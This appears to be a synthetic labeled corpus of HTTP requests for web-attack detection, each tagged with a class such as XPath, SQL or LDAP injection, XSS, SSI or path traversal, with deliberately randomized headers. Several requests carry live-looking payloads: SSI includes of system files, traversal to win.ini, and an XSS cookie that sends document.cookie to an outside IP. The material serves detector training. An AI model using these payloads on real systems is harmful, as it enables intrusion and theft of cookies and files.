Transfer-Encoding: nker
Upgrade: anoNn/3.2, nnna/8.2, etrp7h/2.8
Warning: 410 www.hett9f.tiff "rlxshbn4vdigo" 
X-Forwarded-For: 24.137.231.7
X-Serial-Number: 60721340787846
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gcmy=<!--   #include virtual="d:\windows\autoexec.bat"-->

End - Id: 40401
Start - Id: 49017
class: XPathInjection
GET /tvMy9k37G/7uushjE2sEDbdm1Ly.mspx?ttesf1uelmsms=punDU7y&us9mVbeezmIyx5=otdiv+&le=e8xl_zx3yppt&mer=oaoaap42nihcb%7Esa&iAereeextwtEuo=hta%27++++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or++++%272rb%27++++%3D+++%27&rttdarpa=ucaz5doTlwxmlqx&PaSechompasswdYyHL=s9dbM86&hsenrl8amrohff=tp%7E+pAo%5B&aswierciA=knf%24rlecho3t%24jq1&ozeytIspdT=1327 HTTP/1.1
Host: 179.117.109.9
Connection: close
Accept: */*
Accept-Charset: iso-8859-15;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=93157
Client-ip: 5.173.173.39
Cookie: 7OVp8JXstdinn1=ypfssp3go;3iudtzi2nm8=rmwch5oozbgpzo;tir8ttsue3tne=357;1ceemateegizx8=8838;jeholwmcalumoi=jtAnnrsbitsreae;qgtebtpeSu=rr
Cookie2: $Version="4"
Date: Sun, 20 Dec 09 16:07:37 UTC
ETag: W/"vtLL5g2oqsTTF5CcmnU"
Expect: erftrsq=eavsowes
From: mn1eatis@ye8qeam0O8.be
If-Modified-Since: Mon, 05 Mar 07 13:18:04 CET
If-Unmodified-Since: Wed, 16 Jun 04 17:35:40 CET
If-Match: "iaD2RlKnn_jQQDzST"
If-None-Match: *
If-Range: Sun, 20 Aug 06 13:14:14 CET
Max-Forwards: 70
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest username="ehcteu"
Authorization: ioxaaa ta2H=reIopht
Range: -31
Referer: /uqcE/wcEeE/rpr6e/eord/eccl.php
TE: trailers
Trailer: Host
User-Agent: gsttOl8Rai7f8xced
UA-CPU: 68000
UA-Disp: 119,4854,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1840x9062
Via: 4.7 www.mNepTma.css
Transfer-Encoding: ams4oY; 9Rqemar=5rAt7y5F
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 720 242.255.165.22 "tOitnuAIte3" "Sun, 01 Apr 07 23:33:20 GMT"
X-Forwarded-For: 216.15.10.143
X-Serial-Number: 544350626543951868
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49017
Start - Id: 41993
class: SqlInjection
GET /crArOSVR/3ZI/nceOQ6K74.Q2OKD./tP1EqV@Sn7dM4n/ergdrxeaeensl7nohmc/reihisu/4l/7jci/yYi/PrH8eXlocationLformvbscriptftp/9o_systemjupdate9.aspx?aodnsia=iMi%7EcdnSmocha4&to1nlhedtnw8nru=ihdelete&6itnece0nr=eJeaaTXbtawi%3Cl&1lmlsiyzhOg=ptnodea&YInm.JK9xp_=orJPH30svwx4&eeic055=utpi&t@9OzNf9S9=nulocationo&Po2edtaLotpst=eIthwcblorn&reeujtl=5waihbn0c8dmNn0oo%40and&StEnQe=6405&hiLtrier=tr0ts9E&0dtasmeasxe=or++0%3C%3E%28select++count%28*%29+++from+++++11hU%29&tia=I%5CneowgetC&ea5atrheCkd=styleabid&atetprded2q=716157605 HTTP/1.0
Host: 26.36.247.23
Connection: close
Accept: */*
Accept-Charset: shift_jis;q=0.0, iso-8859-5;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: sdataf-7bs, eitlds9m-htsi7ae, rsas-sy0ionoq;q=0.0
Cache-Control: max-age=95568
Client-ip: 134.245.214.117
Cookie: hn=r9
Cookie2: $Version="419"
Date: Tue, 28 Dec 04 07:49:03 GMT
ETag: "@kad9QMXdlP@jeeYm73"
Expect: taus=aiyn
From: wXro@erouh.com
If-Modified-Since: Thu, 29 Jan 09 21:49:15 UTC
If-Unmodified-Since: Sat, 30 Jan 10 01:03:29 UTC
If-Match: "TA98GTAGo2h3BA5U"
If-None-Match: "0.rygmfxAVgEQxL8B"
If-Range: *
Max-Forwards: 8
MIME-Version: 0.8
Pragma: at='kiq'
Proxy-Authorization: NTLM c2U0dUNCc2F0ZUVuNWVvZ3RhTW10aWdlbGFvZXU0bUE2YWlpYw==
Authorization: WpbNtb soaipaae=aige
Range: -728027,84041-8,736156-
Referer: /saen.js
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/2.8 (Windows; U; WinNT 8.4; ee-lo; rv:7.5.1) Gecko/02010177
UA-CPU: StrongARM
UA-Disp: 8277,101,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 721x544
Via: 6.5 152.108.9.22:2, 2.0 221.26.68.151
Transfer-Encoding: identity
Upgrade: tsem/9.8, icrMn/2.4
Warning: 861 www.leOkisE.js "t5dd1agosNnsneae" "Sat, 17 Apr 04 02:49:48 UTC"
X-Forwarded-For: 23.57.98.8
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41993
Start - Id: 49436
class: XPathInjection
GET /anm1fghagq/zOjnV2AxoyNSUNRwBn/af/Bptr.6KoptinsertrFhjw/ibblgalznkurdfhoOx7/EybplsDeuerpiilfms/wQE4FE4S/idAs.html?nneeiqyood=3opleeno0kptpElit&s0ehL=do7nreliTeEsenr&asrcI8eeSiXoou=tA8Lor2a_M5&ylrraws=ethaas%27+or+++++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28+i+%2B+++j++%2B++++k++++%2B++l+%2B+++1%29%5D+++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++%27mOt%27%3D%27++++c1li%27+++or&eeiirbpw=a%24&SN.Vcpg=n76nV4dZ HTTP/1.1
Host: 196.146.188.99:91
Connection: close
Accept: */*
Accept-Charset: cp-932, x-mac-turkish, iso-8859-3;q=0.1, euc-kr, x-mac-roman;q=0.4
Accept-Encoding: *
Accept-Language: s-aAsquwa;q=0.5, ess-tE;q=0.3, ebki-q5;q=0.6, vE6rm-olhh0l;q=0.2, 35er-e0iiinxi
Cache-Control: max-age=5510
Client-ip: 64.61.159.147
Cookie: hRta=0
Cookie2: $Version="9"
Date: Thu, 16 Aug 07 07:02:22 CET
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: a15tta=behdai;yearlc=mn7sjuc
From: poiter@eorm.biz
If-Modified-Since: Fri, 16 Mar 07 13:31:42 GMT
If-Unmodified-Since: Tue, 20 Dec 05 18:26:55 UTC
If-Match: "psGxxcK8LxL73@UtYtx"
If-None-Match: *
If-Range: Tue, 12 Apr 05 10:44:51 UTC
Max-Forwards: 64
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM YWVhZXJSbWlwaDlobnJvemNhOWhlMHl0M3RjdHR5UGl1czh4
Authorization: NTLM aG54eWh0TWRuY29kYWFhcmRlaWFhTjFldGJ0YW5pZmE=
Range: 60-32,32547-,55039-
Referer: http://www.xdaan5ru.biz/oopvRde/hleuien.mdb
TE: gzip
Trailer: Expect
User-Agent: Mozilla/1.1 (Windows; U; Windows NT 9.3; re-et; rv:2.5.4) Gecko/81271190
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: HTTP/4.8 181.109.229.45
Transfer-Encoding: ofet; oyloye=ti7qs1
Upgrade: e0oOd/9.2, ouh2i/3.3, Ncur/2.5
Warning: 727 www.0daudryu.htm "hsLesemehtnrtasserx6" 
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49436
Start - Id: 37581
class: LdapInjection
POST /jPTtadybG6a8/KZyd_cvgsd/5fDzItfDf7z8KA0U08/YK4zpsJoO3/NHg_IWu/aTi0tg/sbetweenn2K@MURA5.Ureplace/pediA3rd6cdnbgeuqrei/hdS8.asp? HTTP/1.1
Content-Length: 132
Content-Language: bory76Aa,ehsHuie,7B7L
Content-Encoding: identity
Content-Location: http://www.nwesiE.st/efr8n.jpeg
Content-MD5: c2FsRW9lRmNPYWFucHRpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Oct 04 05:20:42 CET
Last-Modified: Wed, 20 Oct 04 17:26:48 GMT
Host: www.vesganye.ch
Connection: close
Accept: application/*, application/*;q=0.3, video/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.0
Accept-Language: *
Cache-Control: max-age=21357
Client-ip: 234.104.82.80
Cookie: bQYWx=Lll;uaLm15ulroyx=336821;mOotaznyo=0330942;h4ceelyf=418;mochalexeccAvRW=fsqe;trrsftt=nbooTdlodg
Cookie2: $Version="2"
Date: Tue, 23 Aug 05 14:08:34 GMT
ETag: "My6Z1FxApjznUqx9Sx"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sat, 26 Jan 08 20:44:44 UTC
If-Unmodified-Since: Wed, 30 Jul 08 07:50:37 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Wed, 18 May 05 18:40:58 GMT
Max-Forwards: 60
MIME-Version: 7.0
Pragma: ePnze=eh
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: NTLM UnJueW5CZWhpemhwYWJzTmZjaDNvZWx5eXNyaGlocmVhdHRsZXRvY2NhZHRrcm8=
Range: 36-,-7
Referer: http://www.hsisid.it/etspq/eeet51ua/o15xfcat/3nefrAa/auonq.html
TE: chunked,deflate,chunked
Trailer: If-None-Match
User-Agent: honsXnsre (isk2bE)
UA-CPU: StrongARM
UA-Disp: 1243,740,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4454x553
Via: FTP/0.8 www.5c0ma5fq.gif:70
Transfer-Encoding: gzip
Upgrade: artg/9.7, Boy/7.1, oiE/0.1, mladno/7.3, Ni9/4.6
Warning: 891 www.Senj6a.tiff "aiMu" "Wed, 07 Jun 06 17:57:47 CET"
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6deleteftkUupdate=)( |    (a5Hqh=enoi*)&0childktelnet=aP9EEH&mc=(n[f&um=e-u1KOgEkN&3let=ldtUf&DZQzA8p9-=winnt1iahrnr

End - Id: 37581
Start - Id: 38701
class: LdapInjection
GET /rxYUO03aNxo6G/casggeiehNEdi/zQ.r@42LtNKETnMR4V/yCPXZY5I.gif?haieEiuirn1eu=yQYIyY&aOdtgeo=wmnhu%27unaAnr4e&sQganp7n=Neiu&iabaualeatyhssg=i%29ia0aors&1txe=umsehxaatO%26htYon&tsptiecar=zsonDfhNu7ll&eehmthtR2njt=15009813&terremzc2cal=7228%29%28%26%28objectClass%3Draeu%29%28%7C%28sn+++%3Doi%29%28cn%3De+++++J*%29%29&rpnFRhlsncitni=e_IamJe HTTP/1.0
Host: 204.34.131.0:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: h-tcii;q=0.0, 3ar-s
Cache-Control: uolcqy6s='darNzhI'
Client-ip: 218.181.248.159
Cookie: haosmgdjnun=2Sgeisdrr;sognue=4951583;yScllknitynhe=tirp8rxneeea3bva
Cookie2: $Version="63"
Date: Sun, 01 Apr 07 06:27:12 GMT
ETag: W/"PVcmfJxnkWU@I6@XHg8W"
Expect: 100-continue
From: lLzaagE6@8ctXe4aie.gov
If-Modified-Since: Thu, 28 Jul 05 13:05:52 UTC
If-Unmodified-Since: Sun, 01 Feb 04 17:28:02 UTC
If-Match: "mr48LUouDuZY81oDxr"
If-None-Match: *
If-Range: Sat, 07 Apr 07 14:03:42 GMT
Max-Forwards: 253
MIME-Version: 5.4
Pragma: nathli='r'
Proxy-Authorization: NTLM eTlKZXRmcGlubWtvZUJlZGZzZ2VBcmhlZ2RlbmViOTM0ZWVnZmVudGloaHdlb2ZC
Authorization: NTLM ZGNzM2VyY3JzbGVjZXNvN25jYXZ1ZW5IU2RvdGVUeXR0ZWVlY2JDbg==
Range: 32-1,3888-481886
Referer: http://www.d8ls6i.st/ToiU4o.css
TE: deflate;q=0.3,trailers,trailers
Trailer: If-Modified-Since
User-Agent: tasapdeti/6.0
UA-CPU: PowerPC
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 420x9995
Via: HTTP/3.6 196.109.23.247, FTP/9.6 www.8tt8.jpg:46, HTTP/5.7 151.63.72.63:0
Transfer-Encoding: deflate
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38701
Start - Id: 48275
class: XSS
PUT /oHsn/otegizthrtnsk/0essremeIsmsit/wNfiframeidQS/eXQBoDj_dj.3D/55dgdNj9Qlf.tiff? HTTP/1.1
Content-Length: 8
Content-Language: ttQler,D
Content-Encoding: deflate
Content-Location: /us7mose/isaer1/hNnqoea.rar
Content-MD5: YWtlaXNoOG5vZWh0MHVMcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 28 Jan 07 16:17:26 CET
Last-Modified: Tue, 23 Mar 04 15:17:37 GMT
Host: www.lrsepttrt.de:59
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 238.157.214.210
Cookie: j4N.=&{[window.open('http://239.164.141.188/se.aspx'+document.cookie);]};;se=07;sisoMp=17826;l5vza=846307815
Cookie2: $Version="056"
Date: Sat, 07 Jan 06 20:44:40 UTC
ETag: "3nPp.-JJwnV9lEfO"
Expect: 100-continue
From: hoRi@FlkUTxtiad.cz
If-Modified-Since: Wed, 21 Jan 04 14:55:12 GMT
If-Unmodified-Since: Tue, 26 Oct 04 05:13:44 UTC
If-Match: *
If-None-Match: "DFRpyEyG0b@XlMdTa"
If-Range: Wed, 13 Jan 10 12:55:33 GMT
Max-Forwards: 615
Pragma: etU=mo
Proxy-Authorization: Basic c2lyY2V0aTpUdDRlNQ==
Authorization: Digest qop=auth
Range: 47-8,720672-48,49834-80
Referer: http://eclssoAj.gov/wqrtlroh/hrtd/flmyyt/tenrBao.avi
Trailer: If-None-Match
User-Agent: Mozilla/4.2 (Machintosh; U; Mac OS X 5.9; AA-sw; rv:8.5.6) Gecko/46068360
UA-CPU: MIPS
UA-OS: Win95
UA-Pixels: 715x493
Via: FTP/7.1 117.127.210.137:1169, ehjn7/9.2 www.soykySyS.tiff, 5.3 144.87.140.108
Transfer-Encoding: laoe; Gie3e=iarhsr
Upgrade: ems/9.3, nLe/5.9, 8btF/5.6, oSoftr/5.9, s3s/8.4
Warning: 212 118.3.73.205 "skqhhoz" 
~~~~~: ~~~~~~~~~~~~~~

pye=1thi

End - Id: 48275
Start - Id: 40488
class: SSI
GET /tuSE7Qievtldodllan/epbptmt4kGSss.tiff?paoUa8l5=n8VH&zjsdlsCulrO=otTolho&ea=Tenfp&uiztc5tosm=%3C%21--%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&ooNyoaen31ylmej=4sno7al2oeci HTTP/1.0
Host: 154.219.108.238:80
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.0, x-mac-cyrillic;q=0.3, euc-tw, iso-8859-1, cp-950
Accept-Encoding: *;q=0.0
Accept-Language: pzeoehd-2ino;q=0.6, Nxh8-teuweki, nalga0i-ois2lx;q=0.9, h7wtttw-k;q=0.1, lbia-Ooveyqo
Cache-Control: min-fresh=70
Client-ip: 213.246.4.171
Cookie: netaeotudrGIt00=ixld6aiwwheree?h;8tcr=g;nomasftwe=o;0ti==p
Cookie2: $Version="027"
Date: Sun, 23 Apr 06 06:10:38 CET
ETag: W/"lV.GdboxeN19M4h0eQU"
Expect: 100-continue
From: Meara5ka@omiicnkiy.st
If-Modified-Since: Thu, 27 Oct 05 04:28:34 CET
If-Unmodified-Since: Thu, 06 Jul 06 22:10:49 CET
If-Match: "9UuyQOu4-ojSsHh02mI7"
If-None-Match: *
If-Range: Fri, 20 Jan 06 16:37:37 UTC
Max-Forwards: 8
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: rstLs avvoe=hvtuI
Range: 120-,-29
Referer: /eRsnhler/cierso/eraoteso/woqhc3wT.php3
TE: gzip,gzip;q=0.3,trailers
Trailer: Warning
User-Agent: Mozilla/0.7 (X11; U; Linux i586 7.9; os-po; rv:2.0.3) Gecko/35612340
UA-CPU: StrongARM
UA-Disp: 609,4490,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0287x026
Via: 2.3 208.108.86.29, HTTP/3.0 114.118.211.239
Transfer-Encoding: deflate
Upgrade: ts54/2.4, d9bEte/1.6, rdsh/2.9
Warning: 801 69.96.230.25 "gie9i8edctt4ENs" "Tue, 27 Jan 04 19:25:43 UTC"
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 55598980904343059452
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 40488
Start - Id: 47676
class: XSS
GET /aecEOrnsreshdso/ljK00aneiercmrw/M-ftphR/nx-9nbHtCxVJ1.L22O/3itErhe/imegNdl/oaobntttcaDgm3.jpg?0bx1tnoxnole=39&php42D=oes&eodyzr9=iudtodhgidwpAdlr6a&F3NWrkH8=nathstops&heihv6lrsistep5=6pXILK4H.rX&ooHqhae=%3Cdiv+++style+%3D+%22++++width%3A+++++expression%28%5Balert++++%28%27AOslma6h%27%29%3B%5D%29%3B+++%22++%3E&eehareeo8nyh9rP=sHYp&pL-fromvmUcopy.2=intn0dausafwH%3C HTTP/1.0
Host: 111.3.126.214
Connection: close
Accept: video/quicktime;q=0.5, text/html, image/*;q=0.5
Accept-Charset: cp-950;q=0.7, us-ascii, gb2312, us-ascii
Accept-Encoding: *;q=0.8
Accept-Language: uSb-ras, nUTere-gboaiO;q=0.9
Cache-Control: no-transform
Client-ip: 66.135.63.45
Cookie: jiaitwcsemsr=lhttpsE =;l1nq0h=ebrfqqhZ0cF9;bld= +l
Cookie2: $Version="699"
Date: Sat, 14 Apr 07 06:21:27 GMT
ETag: W/"z_T1tK75-Wf.Z._"
Expect: 6dleoav=hnlO
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Thu, 04 Jan 07 14:27:36 CET
If-Unmodified-Since: Fri, 20 Nov 09 24:03:23 GMT
If-Match: "C1nWSvohfN1fmR4Gc"
If-None-Match: "50LT_@D2X3C0W8wFRuvs"
If-Range: *
Max-Forwards: 87
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: ndEnf euetw=obBhpIzn
Range: -017,-1,-32
Referer: http://www.hkaati.org/dRsnta/snro/ireniA/gqaoAi.mp3
TE: chunked
Trailer: From
User-Agent: steweeEi
UA-CPU: 68000
UA-Disp: 8471,6615,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 934x7117
Via: zoes/3.0 235.135.82.75
Transfer-Encoding: deflate
Upgrade: OceeiE/8.8, btin/1.3, wrUw/4.8, toehd/0.2, t0m4l/5.1
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47676
Start - Id: 39680
class: SSI
GET /oxF6NzIn/txkYBldI.Mms/oheeeosrjpnImrnnadfu/wtD6v/athbccu2l/ire/sSVd9UkK_xWoglP/arfrnhodg7.shtml?rZNukd5-=%3C%21--++%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++--%3E&EdNNi8fismbkw=a HTTP/1.1
Host: 79.168.140.75
Connection: close
Accept: text/*, text/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 17.56.25.243
Cookie: DS_K4yWxmlt=824;h8fe=t]i
Cookie2: $Version="18"
Date: Tue, 23 Aug 05 14:50:40 CET
ETag: "MnC6RG5yCfdECDak"
Expect: 100-continue
From: g1nes2@zh66rlare.org
If-Modified-Since: Wed, 09 Jun 04 09:30:57 GMT
If-Unmodified-Since: Sun, 24 Sep 06 22:07:04 CET
If-Match: *
If-None-Match: "tfE-Bj7GvTdbVvRkYZrr"
If-Range: Fri, 25 Sep 09 21:58:38 GMT
Max-Forwards: 743
MIME-Version: 9.9
Pragma: iv=yienah
Proxy-Authorization: Digest nonce
Authorization: Digest nc=bfF4DAEf
Range: 047-,52-2392,30343-939979
Referer: http://www.fdu2ytat.be/pamit/zeQak/ok8nua/tniecj.cfm
TE: trailers,trailers
Trailer: User-Agent
User-Agent: etdYsnx1/1.8.0.4
UA-CPU: 68000
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: HTTP/6.5 www.eehma.html:0137, enr/2.5 www.ojn7cmy.htm
Transfer-Encoding: gzip
Upgrade: id8d/1.6, amqh/8.3, de3ts/9.5, se7lsr/8.4
Warning: 733 214.19.169.247 "I5ohianit" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 39680
Start - Id: 35851
class: XPathInjection
GET /ojo82X8r8tbY/iiopsnpe47toRLr4raq/PW0IMEKPKkn-/gUrv.Zqs/trer/ti.htm?wvhrEmpane4a=wUK.mKA2UQ&vF0a-c0rEWku5=0h&ocieetepudtdec=60061&m0ingQtlstta=a4cN&dyePBfvzk=8816&iewl9ofuhtno=3565646212&o5cphbv79aF=%5C7&ehcwNo53r=%5Byt&vMPpg=rqae&3lrxha=765&oaarse=amnhnsHUwaeirttg8o&vuHaatesrh=8+or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++986%3D HTTP/1.0
Host: www.swegi.it
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-turkish;q=0.8, iso-8859-15
Accept-Encoding: 
Accept-Language: tCcecms-s, upt-1otxau
Cache-Control: max-stale
Client-ip: 177.161.53.181
Cookie: roshst=ddhPeuuf'ara8;bvt=tuWeh;lPhdea=1243929390
Cookie2: $Version="94"
Date: Sun, 04 Apr 10 18:00:33 CET
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: iasENO
From: wcsotyes@fnolepci.st
If-Modified-Since: Mon, 13 Dec 04 19:03:32 CET
If-Unmodified-Since: Fri, 14 Jan 05 21:20:23 CET
If-Match: "uVEX3euv.sny8oVnf5Sk"
If-None-Match: "@FW8yxa3Owe8fV_t"
If-Range: "IG_M2_TjEnRTmPZq737_"
Max-Forwards: 06
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest username="ioula3"
Authorization: eirB oi0eoste=ahiEshnn
Range: -15
Referer: /w5nauVwf.tar.gz
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/9.9 (X11; U; Open BSD i386 5.6; 77-tn; rv:3.3.8) Gecko/69067522
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4135x5853
Via: HTTP/5.6 www.tct9dpg.gif
Transfer-Encoding: deflate
Upgrade: ei2y/3.0
Warning: 610 www.24teifwn.png "Opivct0gaEd" 
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35851
Start - Id: 46862
class: XSS
POST /Sb5trvz7bxoeo/sLXSYhw@kkSKWnY8/qeeijrlhn/axtTRJ/omaPno.css? HTTP/1.1
Content-Length: 213
Content-Language: gpSmon
Content-Encoding: deflate
Content-Location: /chcDi/voArir.gif
Content-MD5: ZWhtQWF0YW8wbWVGcGRnbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Mar 04 16:45:32 UTC
Last-Modified: Sat, 24 Apr 04 10:42:27 GMT
Host: www.a6sytt.it
Connection: iridl3
Accept: audio/*;q=0.8
Accept-Charset: x-mac-chinesetrad;q=0.4, iso-8859-5, iso-2022-kr, ks_c_5601-1987;q=0.2
Accept-Encoding: 
Accept-Language: d-eoS8, vx-s4gi, i-I;q=0.9
Cache-Control: no-cache
Client-ip: 152.154.47.47
Cookie: i8whe=9262271130;rhttqp8ekioiii=909946;ia3auhsEt=3tTs4 
Cookie2: $Version="96"
Date: Fri, 12 Aug 05 12:53:51 GMT
ETag: "ynNtDqxUiypefBzDU"
Expect: ascq
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Sun, 03 May 09 20:25:55 CET
If-Unmodified-Since: Wed, 19 Jul 06 09:52:22 GMT
If-Match: *
If-None-Match: "tLkibM2jgQvBLqQxqbD"
If-Range: Mon, 13 Sep 04 08:24:42 CET
Max-Forwards: 7
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: 30Mi x2Ljsisl=rnolxb
Range: 6262-,10870-70169
Referer: http://www.abmm.fr/uiedz/u1hggi.php4
TE: gzip,trailers
Trailer: Referer
User-Agent: Mozilla/4.6 (Windows; U; Win 9x 8.3; ov-os; rv:2.0.3) Gecko/67529040
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 758x384
Via: 2.9 www.tn6tm.css:26767, wlea/9.5 21.7.6.182, gnnh/8.8 www.flrk.shtml:240
Transfer-Encoding: gzip
Upgrade: enf/4.8, aeoeoi/9.1, d2aRmj/2.6
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

D2cmFmkpB=55&ecweiriaronedq=badw1md6Hw5cfk&bghlF18mtl=<div    style=    "   behaviour:   url([http://www.le.com/script/nytkmls.bin]);    "   >&Rc=akY8UY5H&oe9=6ri4m&5kltgnplCsra=953

End - Id: 46862
Start - Id: 39250
class: SSI
GET /tezhhtvsnmd/es5kUB0ZDo/wZ9V9VqVSl9axfans/h9q.png?nwlrSonuOi=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&Tenngla=mjj6S%40lj&Hrt1=3969629&obnath=8MWbrj_SxI&de2iuiTot5=%3E&iin=bzsaea&tgfe7bdaiLNleu=h+w&75oon=r%27%3DeDoHj&nit778mn1ereeQo=%2Blen%5C&sdavcae=rjiq7sndryNiobral HTTP/1.1
Host: 40.24.8.115
Connection: keep-alive
Accept: text/html, text/xml;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: sPug-ag;q=0.7, i-Ea;q=0.8, rtraiphe-3iswd, tmleat-etn
Cache-Control: no-store
Client-ip: 213.207.160.227
Cookie: 7Bbx=dpWjHV;t5QZ7N2O7uR=h98X2Mc;cgn=7238168360;kad=Ie h=rtmprm15l~o'f2t/Nd;4i7nh=1290
Cookie2: $Version="44"
Date: Wed, 15 Sep 04 02:44:26 GMT
ETag: "I6x001IZy.Iz5lBYh"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Fri, 30 Jul 04 13:48:10 UTC
If-Unmodified-Since: Mon, 12 Jun 06 09:09:42 CET
If-Match: "JxwGh.45.f9Swmwp"
If-None-Match: "v1qCHZw9VC4jB0iZWW1"
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 715
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: oihrz enldoer=styei
Range: 5-9725,-6683
Referer: /soude/a4eWrtN/eorkoy/P3h2o6SB.swf
TE: gzip,trailers,trailers
Trailer: Range
User-Agent: mbhercdoras4orh
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 272x2054
Via: FTP/7.1 11.122.118.84, 6.1 57.207.86.149
Transfer-Encoding: gzip
Upgrade: ueiyd/3.1, tac/2.4, eiz/0.3, isofl/2.9, eutR/4.6
Warning: 674 87.251.118.45 "eumooyaaYheigmldr" 
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 2940498240401251
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39250
Start - Id: 45117
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.0
Host: 112.213.9.21
Connection: close
Accept: image/gif
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 172.61.131.171
